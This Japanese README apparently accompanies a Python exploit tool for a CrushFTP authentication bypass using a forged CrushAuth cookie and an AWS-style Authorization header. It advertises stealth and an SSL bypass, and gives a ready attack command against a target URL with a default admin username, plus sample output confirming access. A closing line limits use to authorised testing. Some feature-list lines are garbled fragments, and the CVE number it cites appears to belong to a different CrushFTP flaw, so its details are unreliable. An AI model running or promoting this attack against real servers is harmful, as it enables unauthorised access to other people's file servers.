
CVE-2024-4040のエクスプロイト – CrushAuth CookieとAWSスタイルのヘッダースプーフィングを介したCrushFTPの認証バイパス。ステルス型のPython PoC。安全なトークン生成、SSLバイパス、改善された出力を備えています。
このリポジトリには、CVE-2024-4040 のステルス性の高い Python 概念実証 (PoC) エクスプロイトが含まれています。これは CrushFTP (v10 以下) の重大な脆弱性であり、攻撃者が偽造された CrushAuth Cookie と AWS 形式の Authorization ヘッダーを使用して認証をバイパスできるようにします。
認証されていない攻撃者は、特定の Cookie/ヘッダーの組み合わせを作成することで、脆弱な CrushFTP インスタンスの認証をバイパスし、内部の Web 機能に不正アクセスできます。
secrets を使用した安全な CrushAuth 生成Authorization ヘッダーrequests のみ)python3 CVE-2024-4040.py http://target-ip:8080 --valid_username crushadmin
target_url — CrushFTP サーバーのベース URL
--valid_username — 既知の有効なユーザー名 (デフォルト: crushadmin)
🔍 出力例
[*] CrushFTP Authentication Bypass Exploit
[*] Targeting: http://192.168.1.10:8080
[*] Using username: crushadmin
[+] Exploit Result:
Status_Code : 200
Response_Text : {"getUserNameResponse":{"user_name":"crushadmin"}}
[+] CrushFTP Server is VULNERABLE!
このコードは、教育および許可されたセキュリティテストの目的にのみ使用されます。 自分が所有していない、または明示的なテスト許可を得ていないシステムに対して使用しないでください。
PoC リファクタリング: illdeed